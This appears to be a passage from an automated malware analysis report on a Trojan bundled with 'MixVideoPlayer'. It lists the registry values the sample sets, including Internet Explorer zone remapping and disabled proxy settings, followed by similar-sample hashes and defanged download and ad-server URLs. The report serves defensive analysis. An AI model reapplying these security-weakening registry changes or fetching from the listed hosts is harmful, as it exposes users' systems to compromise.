[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process DeleteTasks.exe:2364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 8B 3C 6E F8 C0 0D 59 B3 61 96 73 3C B0 CD C9"

The process MixVideoPlayer.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Type" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Count" = "17"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Type" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore]
"Time" = "DF 07 06 00 06 00 06 00 00 00 1B 00 0C 00 D2 03"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MixVideoPlayer\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Count" = "17"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "MixVideoPlayer.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore]
"Time" = "DF 07 06 00 06 00 06 00 00 00 1B 00 0C 00 D2 03"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 F9 AE 4B FC 14 42 66 E3 03 76 B7 AC FB C0 86"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\MixVideoPlayer\DEBUG]
"Trace Level"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"

The process LTV2.exe:2108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B BC DF E7 EA 95 59 AD 5E 01 AE C5 C2 D3 48 15"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process LTV2.exe:2468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 17 11 6C 50 2F 14 77 0E B8 59 D4 53 04 61 E4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process LTV2.exe:1012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 3F 5D 74 9E 34 0B 60 0C 4A 3D D0 1C D9 61 21"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\LTV2\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\LTV2\DEBUG]
"Trace Level"

The process %original file name%.exe:1896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\99bf1249-796b-43b5-839f-99f7def784ae]
"mixvideoplayersetup.exe" = "mixvideoplayersetup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1427377772"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 D8 38 E6 B2 CA 8F CE 36 3F 9E 72 6F 4B 4A 41"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BrowserWeb.exe:2452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 D3 74 6F E5 BB 8D 6C 5F EB A4 26 4A 74 73 F8"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 828
d73ac008c2d24f989b873c36182c201e
c1d4f9072604b3b783318d2a52ef16c5
d2ce68240db2ddfdd3151543d8042c82
55cb5ff50014b05c62862b420bf3d013
f719b7373f8f206a75d672990c89b295
9990b53d2b7f0c6b06ceae1d416e9a05
afc20a5a2592ec8027cf629b59d3653a
cfd9f12ae578d37b6fb17727ed65ce9a
a5141ae4001bbee91ad07a4d5da95e8e
ff7b0c61250234c5f3b35f596677c77c
27c01a2f608e7624ea1cf1a54e6e9ee5
1332d9210c02cd4a6ab807dcbd40ca12
97753cd310d63d16618d7fd434863447
0faecc146fa84e05ae5eba6cdf7a0b55
e4af23e86cf9231d6675b908c1ae2f09
fa239133138d27b4b0223523113d403c
54ad4f9a28c8640dd9f179c03597774a
04e6cb47c5ad8021204e47acbb0d5a0f
1eed1826c8e74bb09dee985ec0e45ba0
39ca02dc25905438288e0a343a43e13e
e6ff61d0038126613e1b97df941dbdfd
5018940b74695043d1c67424e469ee58
52bb2557bfe97402addeb2db94485365
df059e69ca8a238ca2a4a52a8a340e47
a2862d8cb34e731c6e7a6b3d626d9062
e08a0cbe900fd248f0d506eaf0545300

URLs

URL	IP
hxxp://maxirg00.maxisrv.com/d5/msjava.dll
hxxp://maxirg00.maxisrv.com/ded3de8ff3bf627ff6d83ea047844f0e91a95b1e757f4fb79ebb72e5215a43a3f1881186e28a14e9dcb327b6a4c44792123f9c4262bdb9bd14978d4785a634ebd1ab2fad42c3ac69be4103bbb5ace2eb9d729a9f30d3fd91
hxxp://maxirg00.maxisrv.com/bf347a9c266220e0e770ae69b02713632b85a487869a70dd771b22fb58989f9aa3ebc8497ffa6be434bb903bf4e644ccef8f18175e98e50b
hxxp://maxirg00.maxisrv.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/style.css
hxxp://maxirg00.maxisrv.com/__maxpower__/render_template/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab?language_code=en
hxxp://maxirg00.maxisrv.com/maxpower-static/apps/34/68794/css/style.css
hxxp://maxirg00.maxisrv.com/__maxpower__/render_screen/2014/11/8b9c3fb4-73d0-11e4-925e-06a3579b0dab/screen_variation=videoUpdater
hxxp://maxirg00.maxisrv.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/i-download.png
hxxp://maxirg00.maxisrv.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loading-install.gif
hxxp://maxirg00.maxisrv.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/progress-bar.png
hxxp://maxirg00.maxisrv.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif
hxxp://maxirg00.maxisrv.com/84/MixVideoPlayerSetup.exe
hxxp://ww0.maxisrv.com/BesH3gE9/pop-up/
hxxp://n149adserv.com/ads?key=5d7c4c519bcd79cc1dca058af3cfebbc&width=0&height=0	204.155.152.38
hxxp://network.adsmarket.com/click/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SYmGakfZSJkGqaYKOBl7dia5Vmon2X?dp=NTN8NTc5fFVBfDF8MXx8|34ee69d9819b5a94df7268d81470e3f3-17-62|9d806520-0be2-11e5-8e44-f8bc125381b8	193.169.104.1
hxxp://5efl2.x.incapdns.net/?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.&ce_cid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.
hxxp://wsf13-1390884529.us-east-1.elb.amazonaws.com/?s1=&s2=&s3=
hxxp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68
hxxp://googleapis.l.google.com/ajax/libs/jquery/1.10.2/jquery.min.js
hxxp://maxirg00.maxisrv.com/88e3cdf5a5346baa2b731227e7a325392c7d17c057f36ec1aa728dd48813418e75a639a1f3c174651b0f651572207b831c51a60cc8716716
hxxp://asmzz.exclusiverewards.startree.science/templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style.css
hxxp://maxirg00.maxisrv.com/__maxpower__/render_screen/2014/11/a888aa68-73d0-11e4-b71d-06a3579b0dab/screen_variation=videoUpdater
hxxp://maxirg00.maxisrv.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/bullet-short.gif
hxxp://asmzz.exclusiverewards.startree.science/templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style-ie.css
hxxp://asmzz.exclusiverewards.startree.science/templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/js/script.js
hxxp://staticrr.tgusrv.com/sdb/df/ffmpeg.zip
hxxp://maxirg00.maxisrv.com/5c9fcfb67b8b50caf3ff80fda5f90c17f2908cdc58dc8a332caa164c680aca4d3d2a2f887f13872573de854a95eea05b833f5cf0a0c8699f
hxxp://ltv-pre.tguhost.com/ltv/install/?idapp=23&action=install&mac=000C290DDD4A&country=US	54.213.145.21
hxxp://staticrr.tgusrv.com/sdb/1d/MixVideoPlayerUpdate.xml?44812e3f-d43a-4eb7-8bef-8c0aefa2ce28
hxxp://staticrr.tgusrv.com/sdb/1d/MixVideoPlayerUpdate.xml?2fcbb09b-96f8-4afb-9e97-d73ce315d8d3
hxxp://staticrr.tgusrv.com/sdb/e0/WebBrowser.xml?d9db319c-edf4-4c23-ae40-ba3c3738dc0f
hxxp://api.yousoftpe.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/progress-bar.png	5.196.157.0
hxxp://api.yousoftpe.com/__maxpower__/render_screen/2014/11/8b9c3fb4-73d0-11e4-925e-06a3579b0dab/screen_variation=videoUpdater	5.196.157.0
hxxp://api.yousoftpe.com/maxpower-static/apps/34/68794/css/style.css	5.196.157.0
hxxp://api.yousoftpe.com/88e3cdf5a5346baa2b731227e7a325392c7d17c057f36ec1aa728dd48813418e75a639a1f3c174651b0f651572207b831c51a60cc8716716	5.196.157.0
hxxp://staticrr.mixvideoplayer.com/sdb/1d/MixVideoPlayerUpdate.xml?2fcbb09b-96f8-4afb-9e97-d73ce315d8d3	185.2.179.74
hxxp://api.yousoftpe.com/__maxpower__/render_screen/2014/11/a888aa68-73d0-11e4-b71d-06a3579b0dab/screen_variation=videoUpdater	5.196.157.0
hxxp://api.yousoftpe.com/maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif	5.196.157.0
